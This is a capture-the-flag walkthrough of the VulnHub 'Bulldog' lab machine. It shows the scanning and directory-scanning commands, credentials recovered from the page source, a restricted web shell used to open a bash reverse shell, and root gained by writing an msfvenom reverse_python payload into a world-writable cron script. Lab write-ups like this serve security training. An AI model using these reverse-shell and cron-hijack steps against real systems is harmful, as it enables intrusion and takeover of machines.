Table of contents
introduce
Series: Bulldog (2 units in this series)
Release date: August 28, 2017
Difficulty: Intermediate
Operating environment: Virtualbox
Goal: Obtain root permission
Learning:
- directory blasting
- Password cracking
- bash rebound shell
- Python file privilege escalation
- Scheduled task privilege escalation
Target machine address: https://www.vulnhub.com/entry/bulldog-1,211/
collect message
host discovery
netdiscover host discovery
sudo netdiscover -i eth1 -r 192.168.56.0/24
host information detection
nmap -p- 192.168.56.106
nmap -p 23,80,8080 -A 192.168.56.106
website detection
The homepage of the website is a static page. There is no valuable information in the source code of the page, and the directory is blasted directly.
directory blasting
dirsearch -u http://192.168.56.106/ --full-url -x 404
Blow out a background address and a dev address, visit http://192.168.56.106/dev/
to view the source code of the page and find some passwords
Use the online website to decrypt:
get two sets of account secrets:
nick:bulldog
sarah:bulldoglover
command execution
Log in to the background: http://192.168.56.106/admin/
Then you can access: http://192.168.56.106/dev/shell/
It seems to be a command execution vulnerability, but it limits the commands that can be used
to see the running commands There echo
, it should be possible bash
to implement a reverse shell with the help of
Scheduled task privilege escalation
A sensitive file is found here. After searching, it is found that this sensitive file is a crontab scheduled task. The execution plan of the task is to execute once every minute. The command is to be /.hiddenAVDirectory/AVApplication.py
executed by the root user.
Next, you can refer to the previous operation: https://www.yuque.com/u1881995/xwfvho/spl1fgit20302ozi#nTG0d
# 搜索属于root的所有文件。文件所有者是root、文件具有可执行权限、其他用户具有可写权限 的所有文件
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null
# 在根目录以递归方式查找文件名中包含 AVApplication.py 的所有文件,并输出文件名及相应行号
grep -rnw '/' -e 'AVApplication.py' 2> /dev/null
- Generate python reverse shell command and write it into py file
msfvenom -p cmd/unix/reverse_python lhost=192.168.229.128 lport=4455 -f raw
Here, use the vi editor to open the py file, and write the commands for the rebound shell generated above. This is a confusion problem, don't worry about it
- Wait up to 1 minute, you will get the shell